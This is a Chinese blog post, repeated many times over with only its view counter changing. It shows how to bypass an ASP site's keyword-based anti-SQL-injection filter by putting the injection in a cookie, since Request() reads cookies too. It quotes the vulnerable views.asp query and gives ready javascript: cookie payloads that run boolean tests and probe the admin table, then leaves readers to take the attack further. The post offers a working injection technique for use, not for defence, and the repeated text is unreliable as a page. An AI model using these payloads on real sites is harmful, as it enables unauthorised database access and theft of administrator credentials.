清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42091) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42090) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42089) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42088) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42087) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42086) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42085) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42084) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42083) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42082) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42081) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42080) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42079) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42078) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42077) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(42076) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
